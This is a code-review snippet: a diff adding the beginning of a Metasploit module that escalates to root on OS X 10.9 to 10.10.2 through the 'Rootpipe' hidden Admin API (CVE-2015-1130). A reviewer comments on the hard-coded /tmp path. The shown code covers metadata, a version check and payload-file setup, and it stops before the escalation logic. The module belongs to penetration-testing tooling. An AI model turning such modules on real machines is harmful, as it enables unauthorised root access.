modules/exploits/osx/local/rootpipe.rb

```diff
@@ -0,0 +1,85 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit4 < Msf::Exploit::Local
+
+  Rank = GreatRanking
+
+  include Msf::Post::File
+  include Msf::Exploit::EXE
+  include Msf::Exploit::FileDropper
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name' => 'Mac OS X "Rootpipe" Privilege Escalation',
+      'Description' => %q{
+        This module exploits a hidden backdoor API in Apple's Admin framework on
+        OS X to escalate privileges to root. Dubbed "Rootpipe."
+
+        Tested on Yosemite 10.10.2 and should work on previous versions.
+
+        The patch for this issue was not backported to older releases.
+      },
+      'Author' => [
+        'Emil Kvarnhammar', # Vulnerability discovery and PoC
+        'joev', # Copy/paste monkey
+        'wvu' # Meta copy/paste monkey
+      ],
+      'References' => [
+        ['CVE', '2015-1130'],
+        ['EDB', '36692'],
+        ['URL', 'https://truesecdev.wordpress.com/2015/04/09/hidden-backdoor-api-to-root-privileges-in-apple-os-x/']
+      ],
+      'Platform' => 'osx',
+      'Arch' => ARCH_X86_64,
+      'SessionTypes' => ['shell', 'meterpreter'],
+      'Targets' => [
+        ['Mac OS X 10.9-10.10.2 x64 (Native Payload)', {}]
+      ],
+      'DefaultTarget' => 0,
+      'DisclosureDate' => 'Apr 9 2015',
+      'License' => MSF_LICENSE
+    ))
+  end
+
+  def check
+    if ver_between(osx_ver, '10.9', '10.10.2')
+      Exploit::CheckCode::Vulnerable
+    else
+      Exploit::CheckCode::Safe
+    end
+  end
+
+  def exploit
+    exploit_path = File.join(Msf::Config.data_directory, 'exploits', 'CVE-2015-1130')
+    python_exploit = File.read(File.join(exploit_path, 'exploit.py'))
+    binary_payload = Msf::Util::EXE.to_osx_x64_macho(framework, payload.encoded)
+    exploit_file = "/tmp/#{Rex::Text::rand_text_alpha_lower(12)}"
+    payload_file = "/tmp/#{Rex::Text::rand_text_alpha_lower(12)}"
```

Comment:
While `/tmp` is usually writable, I've been on some systems where it isn't (ie. you have to use `/var/tmp`). Reckon it's worth making this folder configurable?